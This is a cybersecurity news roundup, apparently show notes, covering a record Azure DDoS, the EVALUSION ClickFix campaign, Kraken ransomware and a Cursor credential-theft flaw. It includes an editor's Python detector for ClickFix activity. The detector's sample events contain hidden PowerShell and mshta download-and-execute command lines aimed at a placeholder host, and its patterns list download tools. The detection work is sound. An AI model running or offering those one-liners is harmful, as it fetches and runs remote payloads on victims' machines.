In today’s cybersecurity news…
Azure hit by DDoS using 500K IPs
Microsoft reported that its Azure network was hit by a 15.72 Tbps DDoS attack from more than 500,000 IPs, launched by the Aisuru botnet. The attack targeted an Australian IP and peaked at 3.64 billion packets per second using high-rate UDP floods. Aisuru, a Turbo Mirai-class IoT botnet, exploits vulnerable home routers, IP cameras, and DVRs, and has previously conducted record-breaking attacks, including a 22.2 Tbps assault mitigated by Cloudflare. (BleepingComputer)
Kenyan government websites back online
Kenya’s government websites were briefly defaced on November 17th, with white supremacist messages targeting ministries including interior, health, education, energy, labor, and water. The Interior Ministry said the attack, linked to a group calling itself “PCP@Kenya,” was contained quickly, with systems now monitored. This follows a reported cyberattack in Somalia on its e-visa system, potentially exposing data of at least 35,000 travelers. (The Record)
EVALUSION emerges
Researchers identified a new malware campaign, EVALUSION, using ClickFix social engineering to deliver Amatera Stealer and NetSupport RAT. Amatera targets crypto wallets, browsers, messaging apps, FTP clients, and email, using evasion techniques. Attacks trick users into running malicious commands via fake CAPTCHAs, which launch PowerShell scripts that download and execute payloads. The campaign also employs phishing kits to harvest credentials selectively. (The Hacker News)
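The mechanics above (a user pastes a command from a fake CAPTCHA into the Run dialog, which spawns PowerShell that downloads and executes a payload) leave a characteristic trace in endpoint telemetry: an interpreter launched from explorer.exe with a one-liner full of download and in-memory-execution cues. The script below is an added example, not code from The Hacker News article or the researchers who documented EVALUSION. It scores constructed process-creation events (Sysmon Event ID 1 / Windows 4688 style, simplified) with assumed heuristics and thresholds; the indicator list and weights are the editor's, not an official detection for this campaign.

```python
import re

# Interpreters a Run-dialog (Win+R) paste typically lands in.
INTERPRETERS = ("powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe")

# Command-line cues common to ClickFix-style one-liners. Assumed heuristics;
# weights are illustrative and should be tuned against your own telemetry.
INDICATORS = [
    ("download",   re.compile(r"\b(iwr|invoke-webrequest|curl|wget|downloadstring|downloadfile|net\.webclient)\b", re.I), 2),
    ("in-memory",  re.compile(r"\b(iex|invoke-expression)\b", re.I), 2),
    ("hidden",     re.compile(r"-w(indowstyle)?\s+hidden|-nop\b|-noprofile\b", re.I), 1),
    ("bypass",     re.compile(r"-ep\s+bypass|-executionpolicy\s+bypass", re.I), 1),
    ("encoded",    re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I), 2),
    ("remote-hta", re.compile(r"mshta(\.exe)?\s+https?://", re.I), 3),
]

# Constructed sample events (not real telemetry). example.invalid is a reserved
# non-resolving domain used as a placeholder.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -nop -c "iwr http://example.invalid/a.txt | iex"'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta http://example.invalid/verify.hta"},
    {"parent": r"C:\Program Files\Microsoft VS Code\Code.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -NoProfile -Command "Get-ChildItem"'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
]


def score_event(ev):
    """Return (score, reasons) for one process-creation event."""
    image = ev["image"].rsplit("\\", 1)[-1].lower()
    parent = ev["parent"].rsplit("\\", 1)[-1].lower()
    if image not in INTERPRETERS:
        return 0, []
    score, reasons = 0, []
    # The ClickFix hallmark: the user pasted the command into the Run dialog or
    # File Explorer address bar, so the parent is explorer.exe rather than a
    # terminal, script host or developer tool.
    if parent == "explorer.exe":
        score += 2
        reasons.append("launched from explorer.exe (Run dialog)")
    for name, rx, weight in INDICATORS:
        if rx.search(ev["cmdline"]):
            score += weight
            reasons.append(name)
    return score, reasons


def find_clickfix(events, threshold=4):
    """Return events whose score reaches the threshold, with the reasons."""
    hits = []
    for i, ev in enumerate(events):
        s, r = score_event(ev)
        if s >= threshold:
            hits.append({"index": i, "score": s, "reasons": r, "cmdline": ev["cmdline"]})
    return hits


if __name__ == "__main__":
    for h in find_clickfix(SAMPLE_EVENTS):
        print(f"[{h['score']}] {h['cmdline']}  <- {', '.join(h['reasons'])}")
```

With the default threshold the first two constructed events are flagged (hidden-window download-and-iex from explorer.exe, and a remote HTA launched from explorer.exe), while the developer-tool PowerShell, the bare interactive console and the encoded command spawned from cmd.exe stay below it. The last case is deliberately ambiguous: an encoded command without a Run-dialog parent scores 2, so lowering the threshold trades false positives for coverage of ClickFix variants that route through cmd.exe first.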
Kraken enhances ransomware attacks
Cisco Talos says the Kraken ransomware group has been conducting large-scale attacks across Windows, Linux and ESXi since February. The group now benchmarks each victim system before encrypting files so it can pick the fastest encryption mode without crashing the machine or triggering defenses. Talos observed intrusions using exposed SMB services for initial access, Cloudflare tunneling for persistent access, and SSHFS for data theft, with ransom demands around $1 million. Kraken lists victims in multiple countries including the US, UK, and Canada, and its new “Last Haven” forum appears to be a collaborative space supported by former HelloKitty operators. (Infosecurity Magazine)
Huge thanks to our episode sponsor, KnowBe4

That’s why there’s KnowBe4’s Cloud Email Security platform. It’s not just another filter—it’s a dynamic, AI-powered layer of defense that detects and stops advanced threats before they reach your users’ inbox.
Request a demo of KnowBe4’s Cloud Email Security at knowbe4.com or visit them this week at Microsoft Ignite booth #5532.
Cursor paves way for credential-stealing attacks
Cursor’s AI-powered developer environment lets attackers hijack its internal browser to steal credentials. Knostic researchers found that Cursor doesn’t validate certain runtime components, allowing a malicious MCP server to inject JavaScript, overwrite login pages, and run code across all browser tabs. Cursor says this isn’t a fixable bug but a risk inherent to how AI coding tools work. Users are warned to review code and avoid auto-run features. (Dark Reading)
Overconfidence is the new zero-day
A new report from Immersive shows cybersecurity teams are overconfident but underprepared. Across 1.8 million simulated exercises, participants averaged 22% accuracy and took 29 hours to contain infections. Readiness scores have flatlined since 2023, with many teams practicing outdated scenarios and excluding non-technical roles, which undermines coordination. Confidence often exceeds actual skill, and metrics like training completion mask capability gaps. The report urges orgs to shift from assumption-based confidence to evidence-backed readiness, continuously testing skills against evolving threats including AI-enabled attacks. (The Register)
Princeton University database breached
Princeton University says a database holding donor, alumni, student, faculty and parent information was accessed on November 10th. The intruder was in the system for under a day and it’s unclear what was viewed, but the database stores names, contact details and donation records. It typically does not include Social Security numbers, financial data or student records covered by federal privacy law. No other systems appear to have been touched. (The Record)
DoorDash email spoof sparks dispute
DoorDash patched a flaw that let anyone with a free DoorDash for Business account send fully branded emails from no-reply@doordash.com, creating a phishing vector. The researcher who found it says the issue sat unaddressed for more than 15 months and was only fixed after he applied pressure, while DoorDash accuses him of attempting extortion and banned him from its bug bounty program. The now-resolved bug didn’t appear to expose user data. (BleepingComputer)
CISA plans hiring spree to rebuild depleted ranks
CISA plans a major hiring push in 2026 to recover from prior staffing cuts and strengthen defenses against China-related threats. Acting director Madhu Gottumukkala cited a roughly 40% vacancy rate in critical mission areas and said the agency will prioritize state cybersecurity coordinators, regional advisers, and talent through DHS’s Cyber Talent Management System. CISA plans to offer more flexible work options, expand university partnerships, reinvigorate internships, and recruit Scholarship for Service graduates to restore operational capacity and mission readiness. (Cybersecurity Dive)